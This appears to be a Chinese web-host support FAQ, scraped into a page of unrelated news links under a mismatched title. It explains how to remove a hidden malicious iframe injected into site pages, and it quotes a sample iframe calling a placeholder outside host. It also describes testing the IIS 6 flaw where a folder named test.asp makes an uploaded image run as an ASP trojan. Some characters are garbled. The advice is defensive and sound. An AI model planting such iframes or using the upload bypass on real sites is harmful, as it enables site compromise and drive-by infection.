• 证监会部署打击股市“黑嘴”铲除毒瘤 2019-05-16
  • 置业指南:盘点沙坪坝在售楼盘 2019-05-16
  • 张汝伦:中国哲学如何在场 2019-05-13
  • 平安智慧城创新车险投保全程线上化 深圳司机开车已不用带保险单了 2019-05-13
  • 马克思的共产主义,什么时候说了生产资料需要“按需分配”了? 2019-05-13
  • 人民日报点赞的孤岛医生:一个人的“水上120” 2019-05-09
  • 张占斌 周跃辉:“九新”——新常态下的全面深化改革 2019-05-09
  • 国税地税合并 将给纳税人带来哪些利好 2019-05-09
  • 日本大阪地震造成4人死亡 300余人受伤 2019-05-07
  • 世界文化遗产旅行地中国国家地理网 2019-04-30
  • 拉莫斯发推力挺德赫亚:你将永远在我的球队中 2019-04-30
  • 空心菜-热门标签-华商生活 2019-04-26
  • 国务院关税税则委员会关于对原产于美国500亿美元进口商品加征关税的公告 2019-04-26
  • 黄晓海的专栏作者中国国家地理网 2019-04-23
  • “上海精神”,和合共生 2019-04-21
  • 当前位置:排球怎么打 >> 帮助中心 >> 正文

    今天排球赛事直播视频:访问网站时杀毒软件提示中了病毒怎么办?

    文章作者:客服中心 文章来源:排球怎么打 发布时间:2014/11/22

    问:访问我的网站时杀毒软件报警提示中了病毒怎么办?

    答:一般是因为您的网站中的某个程序有漏洞,被黑客上传木马后,在您的网页中注入一段代码所致。当您访问您的网站时,也同时打开了另外一个含有病毒的页面(因为这个页面大小都是0,所以是隐藏的),由于病毒并不在您的空间里,所以服务器上的杀毒软件是无法查杀的。

    解决办法:

    例如您是在访问/index.asp 这个网页时提示有病毒的,在网页上点右键》查看源文件。一般黑客会在这个文件尾部插入一段
    《iframe id="baiduframe" border="0" vspace="0" hspace="0" marginwidth="0" marginheight="0"
    framespacing="0" frameborder="0" scrolling="no" width="140" height="75"
    src="//www.xxxx.com/mm.htm";>
    </iframe》 这样的代码,把这段特殊码填在木马查杀的功能中,在线查杀即可。

    因为黑客只是杀入了一段代码,所以即使您用杀毒软件来扫描这个文件,杀毒软件也会认为没有病毒。

    如果尾部没有,则可以先搜索iframe,然后再处理。

    如果搜索完了也没有,则代码可能隐藏在index.asp中调用的其他文件中,比如index.asp 在首部包含了conn.asp head.asp 。有时病毒代码也会隐藏在这些文件里面,按上面的办法下载这些文件并删除相关的代码即可。


    清除病毒后,还需找到您的网站漏洞所在,否则黑洞今后可能再次上传病毒代码; 如果您的网站使用了动网论坛、动易建站等程序,请将他们升级到最新版,或者到这些程序的官方网站上寻求解决方案。如果您是自己开发的程序,需要特别注意有文件上传功能的地方,动网、动网等程序曾经就发生过因为上传功能有漏洞,导致轻易被黑客入侵的情况。 为防止您的电脑中病毒,导致黑客获知了FTP上传密码等问题,建议您查杀木马后及时修改FTP登录密码。

    被挂木马的原因:微软的IIS 6存在严重解析文件名错误

    测试办法:
    在FTP中建立一个 test.asp 的文件夹,文件夹名就是 test.asp ,在这个文件夹中上传一个 hack.jpg,这个jpg的内容可以直接是,然后,用IE远程访问这个hack.jpg,你可以发现,它一样被当作是ASP文件来运行!显然,只要你的网站程序,允许用户自己建立文件夹及上传图片,黑客就可以上传图片来当作ASP木马来运行。

    解决办法:
    在虚拟主机控制面板,设置目录?;?将有上传权限的目录,设置目录?;?就可以解决这个问题。

    可以参考其他公司的同类公告:
    //www.powereasy.net/Announce/3004.html(动易)


    解决办法:我司的虚拟主机提供了目录保管理中心目录?;すδ?可以?;つ承┤菀妆蝗巳肭值哪柯?保存上传文件的目录)。详情请登录用户名--主机管理---管理---设置写入权限。

    下面是目录?;さ囊恍┙樯?

    通常用户网站被黑(如网页被篡改,文件被盗,被删等)都是因为黑客通过网站的文件上传功能将asp/php木马上传到空间并运行造成的。
      所以在无法确认系统是否存在上传漏洞的情况下,只要保证文件上传目录没有脚本运行权限,那么即便黑客将木马上传到您的空间他也无法运行,这样就无法危及您的网站,使您网站更安全。

    注意:
      1、现在仅提供Windows系列主机的目录?;?设置后的目录不能运行脚本程序。
      2、您最多可以设置1个目录。
      3、具体上传目录您需要自行确定,若不清楚请咨询您网站的制作人员。
      4、要取消脚本权限的目录必须存在,否则设置会失败。
      5、添加的目录格式为/xxx/xxx
      6、若是动网论坛,则共有两个上传目录,分别是
      UploadFace与UploadFile。
      7、例:若您要?;eb/bbs/UploadFace目录,则应该填写/bbs/UploadFace



    上一篇: 新网域名故障通知!
    下一篇: 远程无法连接MSSQL数据库及MySQL的原因
    --------------------------------------------------------------------------------------------------------------------------------------
    最新公告:

  • 证监会部署打击股市“黑嘴”铲除毒瘤 2019-05-16
  • 置业指南:盘点沙坪坝在售楼盘 2019-05-16
  • 张汝伦:中国哲学如何在场 2019-05-13
  • 平安智慧城创新车险投保全程线上化 深圳司机开车已不用带保险单了 2019-05-13
  • 马克思的共产主义,什么时候说了生产资料需要“按需分配”了? 2019-05-13
  • 人民日报点赞的孤岛医生:一个人的“水上120” 2019-05-09
  • 张占斌 周跃辉:“九新”——新常态下的全面深化改革 2019-05-09
  • 国税地税合并 将给纳税人带来哪些利好 2019-05-09
  • 日本大阪地震造成4人死亡 300余人受伤 2019-05-07
  • 世界文化遗产旅行地中国国家地理网 2019-04-30
  • 拉莫斯发推力挺德赫亚:你将永远在我的球队中 2019-04-30
  • 空心菜-热门标签-华商生活 2019-04-26
  • 国务院关税税则委员会关于对原产于美国500亿美元进口商品加征关税的公告 2019-04-26
  • 黄晓海的专栏作者中国国家地理网 2019-04-23
  • “上海精神”,和合共生 2019-04-21